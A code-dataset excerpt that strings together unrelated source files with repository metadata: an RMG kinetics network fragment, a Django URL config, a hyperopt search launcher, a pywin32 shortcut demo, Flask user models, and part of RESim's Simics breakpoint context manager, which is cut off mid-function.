Euclidian distance = 0 Multiplied by reaction path degeneracy 3.0 family: intra_H_migration"""), ) reaction( label = 'reaction35', reactants = ['[CH2][CH]OC(C)C=CC(3770)'], products = ['C=C[CH]C(C)O[CH]C(2302)'], transitionState = 'TS35', kinetics = Arrhenius(A=(64.2,'s^-1'), n=2.1, Ea=(63.1784,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [R7Hall;C_rad_out_2H;Cs_H_out_2H] for rate rule [R7HJ_1;C_rad_out_2H;Cs_H_out_2H] Euclidian distance = 1.0 Multiplied by reaction path degeneracy 3.0 family: intra_H_migration"""), ) reaction( label = 
'reaction36', reactants = ['C=C[CH]C(C)O[CH]C(2302)'], products = ['C=COC(C)C=CC(3776)'], transitionState = 'TS36', kinetics = Arrhenius(A=(6.37831e+09,'s^-1'), n=0.137, Ea=(24.9733,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [R7;Y_rad;XH_Rrad] for rate rule [R7radEndo;Y_rad;XH_Rrad] Euclidian distance = 1.0 Multiplied by reaction path degeneracy 3.0 family: Intra_Disproportionation"""), ) reaction( label = 'reaction37', reactants = ['C=C[CH]C(C)O[CH]C(2302)'], products = ['CC1C=CCC(C)O1(2305)'], transitionState = 'TS37', kinetics = Arrhenius(A=(2e+12,'s^-1'), n=0, Ea=(7.5312,'kJ/mol'), T0=(1,'K'), Tmin=(550,'K'), Tmax=(650,'K'), comment="""Estimated using template [R6_SSSDS;C_rad_out_1H;Cpri_rad_out_2H] for rate rule [R6_SSSDS;C_rad_out_H/NonDeC;Cpri_rad_out_2H] Euclidian distance = 1.0 family: Birad_recombination"""), ) reaction( label = 'reaction38', reactants = ['CH2(T)(33)', '[CH]=CC(C)O[CH]C(3832)'], products = ['C=C[CH]C(C)O[CH]C(2302)'], transitionState = 'TS38', kinetics = Arrhenius(A=(2.23625e+06,'m^3/(mol*s)'), n=0.36814, Ea=(0,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [Y_rad;Birad] for rate rule [Cd_pri_rad;Birad] Euclidian distance = 2.0 family: Birad_R_Recombination Ea raised from -1.7 to 0 kJ/mol."""), ) network( label = '556', isomers = [ 'C=C[CH]C(C)O[CH]C(2302)', ], reactants = [ ('C=CC=CC(381)', 'CH3CHO(52)'), ], bathGas = { 'N2': 0.5, 'Ne': 0.5, }, ) pressureDependence( label = '556', Tmin = (300,'K'), Tmax = (2000,'K'), Tcount = 8, Tlist = ([302.47,323.145,369.86,455.987,609.649,885.262,1353.64,1896.74],'K'), Pmin = (0.01,'bar'), Pmax = (100,'bar'), Pcount = 5, Plist = ([0.0125282,0.0667467,1,14.982,79.8202],'bar'), maximumGrainSize = (0.5,'kcal/mol'), minimumGrainCount = 250, method = 'modified strong collision', interpolationModel = ('Chebyshev', 6, 4), activeKRotor = True, activeJRotor = True, rmgmode = True, )
afc614636a168d512fd7a9da31c0dc42b2a9191f
afc4e63338fcb6538117ab2da3ebeb7b6d485399
/campoapp/cedis/urls.py
7b9a3a3c63a8bfbeeffb7c13b8791bc8046c038a
[]
no_license
alrvivas/cedis-erp
7531108ba4dd2212788cb6d108ccacdce42d4b37
aa7d3c5d844473b72786ee6168f9b3a71be349f2
refs/heads/master
2022-11-25T14:21:40.365438
2018-09-28T18:06:41
2018-09-28T18:06:41
146,667,529
0
0
null
2022-11-22T02:52:27
2018-08-29T22:52:30
JavaScript
UTF-8
Python
false
false
725
py
"""URL configuration for the ``cedis`` (distribution-center) app."""
from django.urls import path, re_path

from .views import (
    CedisView,
    CedisCreation,
    RouteCedis,
    RouteCreation,
    ClientRoute,
)

app_name = 'cedis'

# NOTE: Django resolves patterns top-down and stops at the first match,
# so keep the fixed-prefix entries ahead of the catch-all slug routes.
urlpatterns = [
    # Landing page: list of distribution centers (CEDIS).
    path('', CedisView.as_view(), name='cedis'),
    # Creation form for a new CEDIS.
    re_path(r'^nuevo$', CedisCreation.as_view(), name='new'),
    # Detail view of one CEDIS, addressed by its slug.
    path('<slug:slug>/', RouteCedis.as_view(), name='cedis_detail'),
    # Creation form for a new route inside the CEDIS identified by <slug>.
    re_path(r'^(?P<slug>[\w-]+)/nueva-ruta/$', RouteCreation.as_view(), name='new_route'),
    # Clients attached to one route, addressed by the route slug.
    path('route/<slug:slug>/', ClientRoute.as_view(), name='route_detail'),
]
56c2adbfffabb89ea6c69a685d01c01d8098d791
235de1014c7aa9b05ee3c9cce2e7557c6406f800
/Rationale_Analysis/experiments/hyperparam_search.py
d61afcd61a83d2afaa5a437ea45f96894e5a8e2c
[ "MIT" ]
permissive
yuvalpinter/rationale_analysis
b07336142e7de932238a3cc07c656e6616c0e717
2b25c6027d4459fc27e0f6793da6fee695e409a9
refs/heads/master
2020-09-11T08:16:15.031620
2019-11-17T23:25:11
2019-11-17T23:25:11
222,000,886
0
0
MIT
2019-11-15T20:48:41
2019-11-15T20:48:41
null
UTF-8
Python
false
false
1,617
py
"""Random hyper-parameter search driver.

Samples configurations from a hyperopt search space described in a JSON
file, exports each sampled value as an environment variable, and launches
a training shell script once per sample (optionally via SLURM ``sbatch``).
"""
import argparse
import os
import json
import subprocess

import hyperopt
from hyperopt import hp
import numpy as np

# HACK: globally monkey-patches numpy's exp so that hyperopt's
# log-based distributions (e.g. hp.loguniform) sample in base 10
# instead of base e.  This affects *every* user of np.exp in this
# process, not just hyperopt -- deliberate here, but fragile.
np.exp = lambda x : 10**x

parser = argparse.ArgumentParser()
parser.add_argument("--exp-name", type=str, required=True)
parser.add_argument("--search-space-file", type=str, required=True)
parser.add_argument("--dry-run", dest="dry_run", action="store_true")
parser.add_argument("--cluster", dest="cluster", action="store_true")
parser.add_argument('--run-one', dest='run_one', action='store_true')
parser.add_argument('--num-searches', type=int, required=True)

def main(args):
    """Run ``args.num_searches`` independent random-search trials."""
    global_exp_name = args.exp_name
    # Search-space JSON maps each hyperparameter name to
    # {"type": "<hp function name>", "options": {...kwargs...}}.
    search_space_config = json.load(open(args.search_space_file))
    # NOTE(review): eval() of the "type" field executes arbitrary code
    # from the config file -- only use with trusted search-space files.
    hyperparam_space = {k:eval(v['type'])(k, **v['options']) for k, v in search_space_config.items()}

    for i in range(args.num_searches) :
        new_env = os.environ.copy()
        # Draw one random configuration from the joint search space.
        hyperparam_vals = hyperopt.pyll.stochastic.sample(hyperparam_space)
        # Hyperparameters are passed to the training script via
        # environment variables named after the search-space keys.
        for k, v in hyperparam_vals.items():
            new_env[k] = str(v)

        print(hyperparam_vals)
        # Each trial gets its own experiment subdirectory: <exp-name>/search_<i>.
        exp_name = os.path.join(global_exp_name, "search_" + str(i))
        new_env["EXP_NAME"] = exp_name
        cmd = ["bash", "Rationale_Analysis/commands/model_a_train_script.sh"]
        if args.cluster:
            # On a cluster, submit the same command through SLURM instead
            # of running it in-process.
            cmd = ["sbatch", "Cluster_scripts/multi_gpu_sbatch.sh"] + cmd

        print("Running ", cmd, " with exp name ", exp_name)

        if not args.dry_run:
            # check=True: abort the whole search if one trial fails.
            subprocess.run(cmd, check=True, env=new_env)

        if args.run_one :
            # Debug aid: stop after the first sampled configuration.
            break

if __name__ == "__main__":
    args = parser.parse_args()
    main(args)
fcc48edcfdd4d1fc34b4b877308b372de722ad40
8eab8ab725c2132bb8d090cdb2d23a5f71945249
/virt/Lib/site-packages/win32comext/shell/demos/create_link.py
354561b7c50d6342a359a3c4e10a1c066bef399a
[ "MIT" ]
permissive
JoaoSevergnini/metalpy
6c88a413a82bc25edd9308b8490a76fae8dd76ca
c2d0098a309b6ce8c756ff840bfb53fb291747b6
refs/heads/main
2023-04-18T17:25:26.474485
2022-09-18T20:44:45
2022-09-18T20:44:45
474,773,752
3
1
MIT
2022-11-03T20:07:50
2022-03-27T22:21:01
Python
UTF-8
Python
false
false
2,329
py
# link.py
# From a demo by Mark Hammond, corrupted by Mike Fletcher
# (and re-corrupted by Mark Hammond :-)
#
# Create or inspect a Windows shell shortcut (.lnk) file via IShellLink.
from win32com.shell import shell
import itertools
import os

import pythoncom


class PyShortcut:
    """Thin wrapper around the shell's IShellLink COM object.

    Unknown attribute access is delegated to the underlying COM
    interface, so e.g. ``GetPath``/``SetPath``/``GetArguments`` work
    directly on instances of this class.
    """

    def __init__(self):
        self._base = pythoncom.CoCreateInstance(
            shell.CLSID_ShellLink,
            None,
            pythoncom.CLSCTX_INPROC_SERVER,
            shell.IID_IShellLink,
        )

    def load(self, filename):
        """Populate this shortcut from an existing .lnk file."""
        # Get an IPersist interface which allows save/restore of the
        # object to/from files.
        self._base.QueryInterface(pythoncom.IID_IPersistFile).Load(filename)

    def save(self, filename):
        """Write this shortcut to *filename* (second arg 0 = fRemember off)."""
        self._base.QueryInterface(pythoncom.IID_IPersistFile).Save(filename, 0)

    def __getattr__(self, name):
        # Delegate everything else to the COM object.  BUG FIX: the
        # original implicitly returned None when name == "_base", which
        # hid errors and risked infinite recursion before __init__ ran;
        # raise AttributeError as the protocol requires.
        if name != "_base":
            return getattr(self._base, name)
        raise AttributeError(name)


if __name__ == "__main__":
    import sys

    if len(sys.argv) < 2:
        # BUG FIX: the %s placeholder was printed literally because the
        # format argument was never supplied.
        print(
            "Usage: %s LinkFile [path [, args[, description[, working_dir]]]]\n\nIf LinkFile does not exist, it will be created using the other args"
            % sys.argv[0]
        )
        sys.exit(1)
    file = sys.argv[1]
    shortcut = PyShortcut()
    if os.path.exists(file):
        # load and dump info from file...
        shortcut.load(file)
        # now print data...
        print(
            "Shortcut in file %s to file:\n\t%s\nArguments:\n\t%s\nDescription:\n\t%s\nWorking Directory:\n\t%s\nItemIDs:\n\t<skipped>"
            % (
                file,
                shortcut.GetPath(shell.SLGP_SHORTPATH)[0],
                shortcut.GetArguments(),
                shortcut.GetDescription(),
                shortcut.GetWorkingDirectory(),
            )
        )
    else:
        if len(sys.argv) < 3:
            print(
                "Link file does not exist\nYou must supply the path, args, description and working_dir as args"
            )
            sys.exit(1)
        # Pair each supplied value with its setter method.  BUG FIX:
        # map(None, a, b) was a Python 2 idiom (zip with None-padding);
        # on Python 3 it raises TypeError.  itertools.zip_longest has
        # exactly the old padding semantics.
        data = itertools.zip_longest(
            sys.argv[2:],
            ("SetPath", "SetArguments", "SetDescription", "SetWorkingDirectory"),
        )
        for value, function in data:
            if value and function:
                # call function on each non-null value
                getattr(shortcut, function)(value)
        shortcut.save(file)
097ffe889ecca6ba681f647340800b9ee5807fde
4f0d9dbbf1a870b661870ebb1f4ac2306e6e3802
/apps/main/models.py
ccc30a23e7cb0441f0aa491fb824e23c663e04a4
[]
no_license
ItEngine/ItEngine
a5d13af8ae6fc4ebcb4633d0e12e8e7e90a10c63
2932f31f33140b3e066d8108235398276500092e
refs/heads/master
2020-12-03T02:30:36.385719
2016-07-23T00:58:04
2016-07-23T00:58:04
45,215,270
1
0
null
null
null
null
UTF-8
Python
false
false
2,385
py
"""SQLAlchemy models for the main app: users, company sites, portfolio items."""
import datetime

# NOTE(review): Blueprint and listens_for appear unused in this module --
# confirm nothing imports them from here before removing.
from flask import Blueprint
from sqlalchemy import event
from sqlalchemy.event import listens_for
from werkzeug.security import generate_password_hash

from app import db, login_manager


class User(db.Model):
    """ Model User

    Application account model; also satisfies the flask-login user
    protocol via ``is_authenticated``/``is_active``/``get_id``.
    """
    __tablename__ = 'Users'

    id = db.Column(db.Integer, primary_key=True)
    username = db.Column(db.String(30), unique=True, nullable=False)
    email = db.Column(db.String(120), unique=True, nullable=False)
    # Stores the werkzeug hash, never the clear text -- see the
    # 'set' event listener registered below.
    password = db.Column(db.String(120), nullable=False)
    first_name = db.Column(db.String(120), nullable=False)
    last_name = db.Column(db.String(120), nullable=False)
    # Timestamp of account creation (naive UTC via utcnow).
    date_join = db.Column(
        db.DateTime,
        nullable=False,
        default=datetime.datetime.utcnow
    )
    is_active = db.Column(
        db.Boolean,
        default=True
    )
    is_admin = db.Column(
        db.Boolean,
        default=False
    )

    @property
    def is_authenticated(self):
        """Always True: any persisted User counts as authenticated."""
        return True

    def get_id(self):
        """Return the primary key for flask-login session storage."""
        # NOTE(review): flask-login documents get_id() as returning str;
        # this returns an int -- verify session round-tripping.
        try:
            return self.id
        except AttributeError:
            raise NotImplementedError('No `id` attribute - override `get_id`')

    def __repr__(self):
        return '<User %r>' % (self.username)


def hash_password(target, value, oldvalue, initiator):
    """SQLAlchemy 'set' listener: replace a plaintext password with its hash.

    With retval=True (below), the returned value is what actually gets
    stored on the attribute.
    """
    if value is not None:
        return generate_password_hash(value)

# Setup listener on User attribute password
event.listen(User.password, 'set', hash_password, retval=True)


@login_manager.user_loader
def load_user(id):
    """ For flask-login get user id """
    return User.query.get(int(id))


class Site(db.Model):
    """ Model Site

    A company/site profile shown by the application.
    """
    __tablename__ = 'Sites'

    id = db.Column(db.Integer, primary_key=True)
    company = db.Column(db.String(120), nullable=False)
    descrip = db.Column(db.String(500), nullable=False)
    type_company = db.Column(db.String(50), nullable=False)
    site_company = db.Column(db.String(120), nullable=False)
    # Path/name of the uploaded image file.
    photo = db.Column(db.Unicode(128))


class Portfolio(db.Model):
    """ Model Portfolio

    A portfolio/work item with its description and technologies used.
    """
    __tablename__ = 'Portfolios'

    id = db.Column(db.Integer, primary_key=True)
    name = db.Column(db.String(120), nullable=False)
    descrip = db.Column(db.String(500), nullable=False)
    # NOTE(review): "tecnologies" is misspelled but is the persisted
    # column name -- renaming requires a migration, do not just fix it.
    tecnologies = db.Column(db.String(50), nullable=False)
    site_url = db.Column(db.String(120), nullable=False)
    # Path/name of the uploaded image file.
    photo = db.Column(db.Unicode(128))
a6388fd226aa360a3e348f2f9468dcad02a7a36f
f4e57645e92b594dcf611336b774f9febcd09923
/simics/monitorCore/genContextMgr.py
7d63179158f92977c44f66d185ba05a758005c85
[]
no_license
kingking888/RESim
24dc63f23df59c66a4aa455cef25a71ecbf2958a
cb3ea4536df5f93719894db83fbfbe42eb25309a
refs/heads/master
2023-03-21T00:11:12.327617
2021-03-19T22:37:32
2021-03-19T22:37:32
null
0
0
null
null
null
null
UTF-8
Python
false
false
45,525
py
from simics import * ''' Track task context and set/remove beakpoints & haps accordingly. Currently recognises two contexts: default & RESim. Also has a carve-out for "maze_exit" breakpoints/haps, managed as an attribute of the hap. Designed to watch a single thread group. There is one instance of this module per cell. ''' class GenBreakpoint(): def __init__(self, cell, addr_type, mode, addr, length, flags, handle, lgr, prefix=None): self.cell = cell self.addr_type = addr_type self.mode = mode self.addr = addr self.length = length self.flags = flags self.break_num = None self.lgr = lgr self.handle = handle self.prefix = prefix self.set() def show(self): print('\tbreak_handle: %s num: %s add:0x%x' % (str(self.handle), str(self.break_num), self.addr)) def set(self): #self.break_num = SIM_breakpoint(self.cell, self.addr_type, self.mode, self.addr, self.length, self.flags) ''' do set in hap? ''' pass #self.lgr.debug('GenBreakpoint set done in hap, the break handle is %d' % self.handle) def clear(self): if self.break_num is not None: #self.lgr.debug('GenBreakpoint clear breakpoint %d break handle is %d' % (self.break_num, self.handle)) SIM_delete_breakpoint(self.break_num) self.break_num = None class GenHap(): def __init__(self, hap_type, callback, parameter, handle, lgr, breakpoint_list, name, immediate=True): ''' breakpoint_start and breakpont_end are GenBreakpoint types ''' self.hap_type = hap_type self.callback = callback ''' used with afl ''' self.parameter = parameter self.breakpoint_list = breakpoint_list self.lgr = lgr self.hap_num = None self.handle = handle self.name = name self.set(immediate) def show(self): if self.handle is not None and self.hap_num is not None: print('hap_handle: %d num: %d name: %s' % (self.handle, self.hap_num, self.name)) for bp in self.breakpoint_list: bp.show() def hapAlone(self, (bs, be)): #self.lgr.debug('GenHap alone set hap_handle %s name: %s on range %s %s (0x%x 0x%x) break handles %s %s' % (str(self.handle), # self.name, 
str(bs.break_num), str(be.break_num), # bs.addr, be.addr, str(bs.handle), str(be.handle))) self.hap_num = SIM_hap_add_callback_range(self.hap_type, self.callback, self.parameter, bs.break_num, be.break_num) #self.lgr.debug('GenHap alone set hap_handle %s assigned hap %s name: %s on range %s %s (0x%x 0x%x) break handles %s %s' % (str(self.handle), # str(self.hap_num), self.name, str(bs.break_num), str(be.break_num), # bs.addr, be.addr, str(bs.handle), str(be.handle))) def set(self, immediate=True): ''' NOTE: different calls to SIM_brekapoint below ''' if len(self.breakpoint_list) > 1: for bp in self.breakpoint_list: bp.break_num = SIM_breakpoint(bp.cell, bp.addr_type, bp.mode, bp.addr, bp.length, bp.flags) if bp.prefix is not None: command = 'set-prefix %d "%s"' % (bp.break_num, bp.prefix) SIM_run_alone(SIM_run_command, command) #self.lgr.debug('contextManager prefix cmd: %s' % command) self.lgr.debug('GenHap breakpoint created for hap_handle %d assigned breakpoint num %d' % (self.handle, bp.break_num)) bs = self.breakpoint_list[0] be = self.breakpoint_list[-1] #self.lgr.debug('GenHap callback range') if immediate: #self.lgr.debug('GenHap set hap_handle %s assigned name: %s on range %s %s (0x%x 0x%x) break handles %s %s' % (str(self.handle), # self.name, str(bs.break_num), str(be.break_num), # bs.addr, be.addr, str(bs.handle), str(be.handle))) self.hap_num = SIM_hap_add_callback_range(self.hap_type, self.callback, self.parameter, bs.break_num, be.break_num) #self.lgr.debug('GenHap set hap_handle %s assigned hap %s name: %s on range %s %s (0x%x 0x%x) break handles %s %s' % (str(self.handle), # str(self.hap_num), self.name, str(bs.break_num), str(be.break_num), # bs.addr, be.addr, str(bs.handle), str(be.handle))) else: SIM_run_alone(self.hapAlone, (bs, be)) elif len(self.breakpoint_list) == 1: bp = self.breakpoint_list[0] #self.lgr.debug('bp.cell is %s addr %s' % (str(bp.cell), str(bp.addr))) if bp.addr is None: self.lgr.error('contextManager, set bp.addr is none') 
return bp.break_num = SIM_breakpoint(bp.cell, bp.addr_type, bp.mode, bp.addr, bp.length, bp.flags) if bp.prefix is not None: command = 'set-prefix %d "%s"' % (bp.break_num, bp.prefix) SIM_run_alone(SIM_run_command, command) #self.lgr.debug('contextManager prefix cmd: %s' % command) #self.lgr.debug('GenHap set hap_handle %s name: %s on break %s (0x%x) break_handle %s' % (str(self.handle), # self.name, str(bp.break_num), bp.addr, str(bp.handle))) self.hap_num = SIM_hap_add_callback_index(self.hap_type, self.callback, self.parameter, bp.break_num) #self.lgr.debug('GenHap set hap_handle %s assigned hap %s name: %s on break %s (0x%x) break_handle %s' % (str(self.handle), str(self.hap_num), # self.name, str(bp.break_num), bp.addr, str(bp.handle))) else: self.lgr.error('GenHap, no breakpoints') def clear(self, dumb=None): if self.hap_num is not None: for bp in self.breakpoint_list: bp.clear() SIM_hap_delete_callback_id(self.hap_type, self.hap_num) #self.lgr.debug('GenHap clear hap %d handle %d' % (self.hap_num, self.handle)) self.hap_num = None class GenContextMgr(): def __init__(self, top, cell_name, task_utils, param, cpu, lgr): self.top = top self.cell_name = cell_name self.task_utils = task_utils self.param = param self.task_utils = task_utils self.mem_utils = task_utils.getMemUtils() self.debugging_pid = None self.debugging_pid_saved = None self.debugging_comm = None self.debugging_cell = None self.cpu = cpu self.pageFaultGen = None ''' watch multiple tasks, e.g., threads ''' self.watch_rec_list = {} self.watch_rec_list_saved = {} self.pending_watch_pids = [] self.nowatch_list = [] self.watching_tasks = False self.single_thread = False self.lgr = lgr self.ida_message = None self.exit_break_num = None self.exit_cb_num = None self.phys_current_task = task_utils.getPhysCurrentTask() self.task_break = None self.task_hap = None self.breakpoints = [] self.haps = [] self.break_handle = 0 self.hap_handle = 0 self.text_start = None self.text_end = None self.catch_pid = None 
self.catch_callback = None self.watch_only_this = False ''' used with afl ''' self.callback = None self.exit_callback = None ''' experiment with tracking task switches among watched pids ''' self.task_switch = {} obj = SIM_get_object(cell_name) self.default_context = obj.cell_context context = 'RESim_%s' % cell_name cmd = 'new-context %s' % context SIM_run_command(cmd) obj = SIM_get_object(context) self.resim_context = obj self.lgr.debug('context_manager cell %s resim_context defined as obj %s' % (self.cell_name, str(obj))) ''' avoid searching all task recs to know if pid being watched ''' self.pid_cache = [] self.group_leader = None ''' watch pointers to task recs to catch kills ''' self.task_rec_hap = {} self.task_rec_bp = {} self.task_rec_watch = {} ''' avoid multiple calls to taskRecHap ''' self.demise_cache = [] ''' used by pageFaultGen to supress breaking on apparent kills ''' self.watching_page_faults = False def getRealBreak(self, break_handle): for hap in self.haps: for bp in hap.breakpoint_list: if bp.handle == break_handle: return bp.break_num return None def getBreakHandle(self, real_bp): for hap in self.haps: #self.lgr.debug('getBreakHandle hap %s' % (hap.name)) for bp in hap.breakpoint_list: #self.lgr.debug('getBreakHandle look for %d got %d' % (real_bp, bp.break_num)) if bp.break_num == real_bp: return bp.handle return None def showHaps(self): self.lgr.debug('contextManager showHaps') for hap in self.haps: hap.show() #def getRESimContext(self): # return self.debugging_cell def recordText(self, start, end): self.lgr.debug('contextMgr recordText 0x%x 0x%x' % (start, end)) self.text_start = start self.text_end = end def getText(self): return self.text_start, self.text_end def nextHapHandle(self): self.hap_handle = self.hap_handle+1 return self.hap_handle def nextBreakHandle(self): self.break_handle = self.break_handle+1 return self.break_handle def genBreakpoint(self, cell, addr_type, mode, addr, length, flags, prefix=None): ''' create a 
GenContextManager breakpoint. This is not yet set. Determine if the context should be resim, e.g., only when one of our debugging processes is schedule. ''' handle = self.nextBreakHandle() if self.debugging_pid is not None and addr_type == Sim_Break_Linear: cell = self.resim_context #self.lgr.debug('gen break with resim context %s' % str(self.resim_context)) bp = GenBreakpoint(cell, addr_type, mode, addr, length, flags, handle, self.lgr, prefix=prefix) self.breakpoints.append(bp) #self.lgr.debug('genBreakpoint handle %d number of breakpoints is now %d prefix %s' % (handle, len(self.breakpoints), prefix)) return handle def genDeleteBreakpoint(self, handle): #self.lgr.debug('genDeleteBreakpoint handle %d -- do not delete, will be done in GenHap' % handle) #for bp in self.breakpoints: # if bp.handle == handle: # bp.clear() # self.breakpoints.remove(bp) # return #self.lgr.debug('genDeleteBreakpoint could not find break handle %d' % handle) pass def genDeleteHap(self, hap_handle, immediate=False): if hap_handle is None: self.lgr.warning('genDelteHap called with handle of none') return #self.lgr.debug('genDeleteHap hap_handle %d' % hap_handle) hap_copy = list(self.haps) for hap in hap_copy: if hap.handle == hap_handle: if immediate: hap.clear(None) else: SIM_run_alone(hap.clear, None) #self.lgr.debug('num breaks in hap %d is %d' % (hap_handle, len(hap.breakpoint_list))) for bp in hap.breakpoint_list: if bp in self.breakpoints: #self.lgr.debug('removing bp %d from hap_handle %d break_num %s' % (bp.handle, hap_handle, str(bp.break_num))) self.breakpoints.remove(bp) else: self.lgr.warning('genDeleteHap bp not in list, handle %d ' % (bp.handle)) #self.lgr.debug('genDeleteHap removing hap %d from list' % hap.handle) self.haps.remove(hap) return #self.lgr.debug('genDeleteHap could not find hap_num %d' % hap_handle) def genHapIndex(self, hap_type, callback, parameter, handle, name=None): #self.lgr.debug('genHapIndex break_handle %d' % handle) for bp in self.breakpoints: if 
bp.handle == handle: hap_handle = self.nextHapHandle() hap = GenHap(hap_type, callback, parameter, hap_handle, self.lgr, [bp], name) self.haps.append(hap) return hap.handle #self.lgr.error('genHapIndex failed to find break %d' % breakpoint) def genHapRange(self, hap_type, callback, parameter, handle_start, handle_end, name=None): #self.lgr.debug('genHapRange break_handle %d %d' % (handle_start, handle_end)) bp_start = None bp_list = [] for bp in self.breakpoints: if bp.handle >= handle_start: bp_list.append(bp) if bp.handle == handle_end: hap_handle = self.nextHapHandle() hap = GenHap(hap_type, callback, parameter, hap_handle, self.lgr, bp_list, name, immediate=False) #self.lgr.debug('contextManager genHapRange set hap %s on %d breaks' % (name, len(bp_list))) self.haps.append(hap) return hap.handle #self.lgr.error('genHapRange failed to find break for handles %d or %d' % (breakpoint_start, breakpoint_end)) def setAllBreak(self): for bp in self.breakpoints: bp.set() if self.pageFaultGen is not None: self.pageFaultGen.recordPageFaults() def setAllHap(self, only_maze_breaks=False): for hap in self.haps: if (not only_maze_breaks and hap.name != 'exitMaze') or (only_maze_breaks and hap.name == 'exitMaze'): hap.set() def clearAllBreak(self): ''' Called to clear breaks within the resim context ''' for bp in self.breakpoints: #if bp.cell == self.resim_context: bp.clear() if self.pageFaultGen is not None: self.pageFaultGen.stopPageFaults() def clearAllHap(self, keep_maze_breaks=False): #self.lgr.debug('clearAllHap start') for hap in self.haps: if not keep_maze_breaks or hap.name != 'exitMaze': hap.clear() #self.lgr.debug('clearAllHap finish') def getThreadRecs(self): return self.watch_rec_list.keys() def getThreadPids(self): retval = [] for rec in self.watch_rec_list: pid = self.watch_rec_list[rec] #self.lgr.debug('genContextManager getThreadPids append %d to returned thread pid list' % (pid)) retval.append(pid) return retval def addNoWatch(self): ''' only watch maze exits 
for the current task. NOTE: assumes those are set after call to this function''' self.lgr.debug('contextManager cell %s addNoWatch' % self.cell_name) if len(self.nowatch_list) == 0 and len(self.watch_rec_list) == 0: ''' had not been watching and tasks. start so we can not watch this one ''' self.setTaskHap() self.watching_tasks=True self.lgr.debug('contextManager addNoWatch began watching tasks') rec = self.task_utils.getCurTaskRec() self.nowatch_list.append(rec) self.lgr.debug('contextManager addNoWatch for rec 0x%x' % rec) SIM_run_alone(self.clearAllHap, True) def rmNoWatch(self): ''' restart watching the current task, assumes it was added via addNoWatch ''' rec = self.task_utils.getCurTaskRec() if rec in self.nowatch_list: self.nowatch_list.remove(rec) self.lgr.debug('contextManager rmNoWatch, rec 0x%x removed from nowatch list' % rec) if len(self.nowatch_list) == 0 and len(self.watch_rec_list) == 0: ''' stop all task watching ''' self.stopWatchTasks() SIM_run_alone(self.setAllHap, False) self.lgr.debug('contextManager addNoWatch stopped watching tasks, enabled all HAPs') else: ''' restart watching ''' SIM_run_alone(self.setAllHap, False) else: self.lgr.error('contextManager rmNoWatch, rec 0x%x not in nowatch list' % rec) def changedThread(self, cpu, third, forth, memory): ''' guts of context managment. 
set or remove breakpoints/haps depending on whether we are tracking the newly scheduled process ''' if self.task_hap is None: return # get the value that will be written into the current thread address new_addr = SIM_get_mem_op_value_le(memory) prev_task = self.task_utils.getCurTaskRec() #DEBUG BLOCK pid = self.mem_utils.readWord32(cpu, new_addr + self.param.ts_pid) comm = self.mem_utils.readString(cpu, new_addr + self.param.ts_comm, 16) prev_pid = self.mem_utils.readWord32(cpu, prev_task + self.param.ts_pid) prev_comm = self.mem_utils.readString(cpu, prev_task + self.param.ts_comm, 16) self.lgr.debug('changeThread from %d (%s) to %d (%s) new_addr 0x%x watchlist len is %d debugging_comm is %s context %s' % (prev_pid, prev_comm, pid, comm, new_addr, len(self.watch_rec_list), self.debugging_comm, cpu.current_context)) if len(self.pending_watch_pids) > 0: ''' Are we waiting to watch pids that have not yet been scheduled? We don't have the process rec until it is ready to schedule. ''' if pid in self.pending_watch_pids: self.lgr.debug('changedThread, pending add pid %d to watched processes' % pid) self.watch_rec_list[new_addr] = pid self.pending_watch_pids.remove(pid) self.watchExit(rec=new_addr, pid=pid) if pid not in self.pid_cache and comm == self.debugging_comm: group_leader = self.mem_utils.readPtr(cpu, new_addr + self.param.ts_group_leader) leader_pid = self.mem_utils.readWord32(cpu, group_leader + self.param.ts_pid) add_it = False if leader_pid in self.pid_cache: add_it = True elif pid == leader_pid: parent = self.mem_utils.readPtr(cpu, new_addr + self.param.ts_real_parent) if parent in self.watch_rec_list: parent_pid = self.mem_utils.readWord32(cpu, parent + self.param.ts_pid) self.lgr.debug('contextManager new clone %d is its own leader, but parent %d is in cache. Call the parent the leader.' 
% (pid, parent_pid)) add_it = True leader_pid = parent_pid else: self.lgr.debug('contextManager pid:%d (%s) not in cache, nor is parent in watch_rec_list 0x%x' % (pid, comm, parent)) if add_it: ''' TBD, we have no reason to believe this clone is created by the group leader? Using parent or real_parent is no help''' self.lgr.debug('contextManager adding clone %d (%s) leader is %d' % (pid, comm, leader_pid)) self.addTask(pid, new_addr) self.top.addProc(pid, leader_pid, comm, clone=True) self.watchExit(new_addr, pid) self.top.recordStackClone(pid, leader_pid) else: self.lgr.debug('contextManager pid:%d (%s) not in cache, group leader 0x%x leader pid %d' % (pid, comm, group_leader, leader_pid)) elif pid in self.pid_cache and new_addr not in self.watch_rec_list: self.lgr.debug('*********** pid in cache, but new_addr not in watch list? eh?') if not self.watching_tasks and \ (new_addr in self.watch_rec_list or (len(self.watch_rec_list) == 0 and len(self.nowatch_list) > 0)) \ and not (self.single_thread and pid != self.debugging_pid): ''' Not currently watching processes, but new process should be watched ''' if self.debugging_pid is not None: cpu.current_context = self.resim_context #self.lgr.debug('resim_context') #self.lgr.debug('Now scheduled %d new_addr 0x%x' % (pid, new_addr)) self.watching_tasks = True self.setAllBreak() only_maze_breaks = False if new_addr in self.nowatch_list: only_maze_breaks = True #self.lgr.debug('contextManager changedThread, only do maze breaks') SIM_run_alone(self.setAllHap, only_maze_breaks) elif self.watching_tasks: if prev_task in self.nowatch_list: if new_addr not in self.nowatch_list: ''' was watching only maze exits, watch everything but maze''' #self.lgr.debug('was watching only maze, now watch all ') SIM_run_alone(self.clearAllHap, False) SIM_run_alone(self.setAllHap, False) elif new_addr in self.nowatch_list: ''' was watching everything, watch only maze ''' #self.lgr.debug('Now only watch maze') SIM_run_alone(self.clearAllHap, 
